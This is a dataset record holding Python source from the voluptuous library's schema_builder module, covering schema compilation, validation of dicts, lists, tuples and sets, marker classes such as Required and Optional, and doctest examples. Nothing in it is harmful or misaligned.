... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
_sort_item = _compile_itemsort()
def _iterate_mapping_candidates(schema):
"""Iterate over schema in a meaningful order."""
# Without this, Extra might appear first in the iterator, and fail to
# validate a key even though it's a Required that has its own validation,
# generating a false positive.
return sorted(iteritems(schema), key=_sort_item)
def _iterate_object(obj):
"""Return iterator over object attributes. Respect objects with
defined __slots__.
"""
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key))
class Msg(object):
"""Report a user-friendly message if a schema fails to validate.
>>> validate = Schema(
... Msg(['one', 'two', int],
... 'should be one of "one", "two" or an integer'))
>>> with raises(er.MultipleInvalid, 'should be one of "one", "two" or an integer'):
... validate(['three'])
Messages are only applied to invalid direct descendants of the schema:
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!'))
>>> with raises(er.MultipleInvalid, 'expected int @ data[0][0]'):
... validate([['three']])
The type which is thrown can be overridden but needs to be a subclass of Invalid
>>> with raises(er.SchemaError, 'Msg can only use subclases of Invalid as custom class'):
... validate = Schema(Msg([int], 'should be int', cls=KeyError))
If you do use a subclass of Invalid, that error will be thrown (wrapped in a MultipleInvalid)
>>> validate = Schema(Msg([['one', 'two', int]], 'not okay!', cls=er.RangeInvalid))
>>> try:
... validate(['three'])
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], er.RangeInvalid)
"""
def __init__(self, schema, msg, cls=None):
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("Msg can only use subclases of"
" Invalid as custom class")
self._schema = schema
self.schema = Schema(schema)
self.msg = msg
self.cls = cls
def __call__(self, v):
try:
return self.schema(v)
except er.Invalid as e:
if len(e.path) > 1:
raise e
else:
raise (self.cls or er.Invalid)(self.msg)
def __repr__(self):
return 'Msg(%s, %s, cls=%s)' % (self._schema, self.msg, self.cls)
class Object(dict):
"""Indicate that we should work with attributes, not keys."""
def __init__(self, schema, cls=UNDEFINED):
self.cls = cls
super(Object, self).__init__(schema)
class VirtualPathComponent(str):
def __str__(self):
return '<' + self + '>'
def __repr__(self):
return self.__str__()
# Markers.py
class Marker(object):
"""Mark nodes for special treatment."""
def __init__(self, schema_, msg=None, description=None):
self.schema = schema_
self._schema = Schema(schema_)
self.msg = msg
self.description = description
def __call__(self, v):
try:
return self._schema(v)
except er.Invalid as e:
if not self.msg or len(e.path) > 1:
raise
raise er.Invalid(self.msg)
def __str__(self):
return str(self.schema)
def __repr__(self):
return repr(self.schema)
def __lt__(self, other):
if isinstance(other, Marker):
return self.schema < other.schema
return self.schema < other
def __hash__(self):
return hash(self.schema)
def __eq__(self, other):
return self.schema == other
def __ne__(self, other):
return not(self.schema == other)
class Optional(Marker):
"""Mark a node in the schema as optional, and optionally provide a default
>>> schema = Schema({Optional('key'): str})
>>> schema({})
{}
>>> schema = Schema({Optional('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Optional('key', default=list): list})
>>> schema({})
{'key': []}
If 'required' flag is set for an entire schema, optional keys aren't required
>>> schema = Schema({
... Optional('key'): str,
... 'key2': str
... }, required=True)
>>> schema({'key2':'value'})
{'key2': 'value'}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Optional, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Exclusive(Optional):
"""Mark a node in the schema as exclusive.
Exclusive keys inherited from Optional:
>>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
>>> schema({'alpha': 30})
{'alpha': 30}
Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
... schema({'alpha': 30, 'beta': 45})
For example, API can provides multiple types of authentication, but only one works in the same time:
>>> msg = 'Please, use only one type of authentication at the same time.'
>>> schema = Schema({
... Exclusive('classic', 'auth', msg=msg):{
... Required('email'): basestring,
... Required('password'): basestring
... },
... Exclusive('internal', 'auth', msg=msg):{
... Required('secret_key'): basestring
... },
... Exclusive('social', 'auth', msg=msg):{
... Required('social_network'): basestring,
... Required('token'): basestring
... }
... })
>>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
... schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
... 'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
"""
def __init__(self, schema, group_of_exclusion, msg=None, description=None):
super(Exclusive, self).__init__(schema, msg=msg,
description=description)
self.group_of_exclusion = group_of_exclusion
class Inclusive(Optional):
""" Mark a node in the schema as inclusive.
Inclusive keys inherited from Optional:
>>> schema = Schema({
... Inclusive('filename', 'file'): str,
... Inclusive('mimetype', 'file'): str
... })
>>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
>>> data == schema(data)
True
Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
>>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
... schema({'filename': 'dog.jpg'})
If none of the keys in the group are present, it is accepted:
>>> schema({})
{}
For example, API can return 'height' and 'width' together, but not separately.
>>> msg = "Height and width must exist together"
>>> schema = Schema({
... Inclusive('height', 'size', msg=msg): int,
... Inclusive('width', 'size', msg=msg): int
... })
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'height': 100})
>>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
... schema({'width': 100})
>>> data = {'height': 100, 'width': 100}
>>> data == schema(data)
True
"""
def __init__(self, schema, group_of_inclusion,
msg=None, description=None, default=UNDEFINED):
super(Inclusive, self).__init__(schema, msg=msg,
default=default,
description=description)
self.group_of_inclusion = group_of_inclusion
class Required(Marker):
"""Mark a node in the schema as being required, and optionally provide a default value.
>>> schema = Schema({Required('key'): str})
>>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
... schema({})
>>> schema = Schema({Required('key', default='value'): str})
>>> schema({})
{'key': 'value'}
>>> schema = Schema({Required('key', default=list): list})
>>> schema({})
{'key': []}
"""
def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
super(Required, self).__init__(schema, msg=msg,
description=description)
self.default = default_factory(default)
class Remove(Marker):
"""Mark a node in the schema to be removed and excluded from the validated
output. Keys that fail validation will not raise ``Invalid``. Instead, these
keys will be treated as extras.
>>> schema = Schema({str: int, Remove(int): str})
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
... schema({'keep': 1, 1: 1.0})
>>> schema({1: 'red', 'red': 1, 2: 'green'})
{'red': 1}
>>> schema = Schema([int, Remove(float), Extra])
>>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
[1, 2, 3, 5, '7']
"""
def __call__(self, v):
super(Remove, self).__call__(v)
return self.__class__
def __repr__(self):
return "Remove(%r)" % (self.schema,)
def __hash__(self):
return object.__hash__(self)
def message(default=None, cls=None):
"""Convenience decorator to allow functions to provide a message.
Set a default message:
>>> @message('not an integer')
... def isint(v):
... return int(v)
>>> validate = Schema(isint())
>>> with raises(er.MultipleInvalid, 'not an integer'):
... validate('a')
The message can be overridden on a per validator basis:
>>> validate = Schema(isint('bad'))
>>> with raises(er.MultipleInvalid, 'bad'):
... validate('a')
The class thrown too:
>>> class IntegerInvalid(er.Invalid): pass
>>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
>>> try:
... validate('a')
... except er.MultipleInvalid as e:
... assert isinstance(e.errors[0], IntegerInvalid)
"""
if cls and not issubclass(cls, er.Invalid):
raise er.SchemaError("message can only use subclases of Invalid as custom class")
def decorator(f):
@wraps(f)
def check(msg=None, clsoverride=None):
@wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
return wrapper
return check
return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def _merge_args_with_kwargs(args_dict, kwargs_dict):
"""Merge args with kwargs."""
ret = args_dict.copy()
ret.update(kwargs_dict)
return ret
def validate(*a, **kw):
"""Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2
"""
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | _iterate_object | python | def _iterate_object(obj):
d = {}
try:
d = vars(obj)
except TypeError:
# maybe we have named tuple here?
if hasattr(obj, '_asdict'):
d = obj._asdict()
for item in iteritems(d):
yield item
try:
slots = obj.__slots__
except AttributeError:
pass
else:
for key in slots:
if key != '__dict__':
yield (key, getattr(obj, key)) | Return iterator over object attributes. Respect objects with
defined __slots__. | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L885-L906 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
long = int
unicode = str
basestring = str
ifilter = filter
def iteritems(d):
return d.items()
else:
from itertools import ifilter
def iteritems(d):
return d.iteritems()
if sys.version_info >= (3, 3):
_Mapping = collections.abc.Mapping
else:
_Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
def __nonzero__(self):
return False
def __repr__(self):
return '...'
UNDEFINED = Undefined()
def Self():
raise er.SchemaError('"Self" should never be called')
def default_factory(value):
if value is UNDEFINED or callable(value):
return value
return lambda: value
@contextmanager
def raises(exc, msg=None, regex=None):
try:
yield
except exc as e:
if msg is not None:
assert str(e) == msg, '%r != %r' % (str(e), msg)
if regex is not None:
assert re.search(regex, str(e)), '%r does not match %r' % (str(e), regex)
def Extra(_):
"""Allow keys in the data that are not present in the schema."""
raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
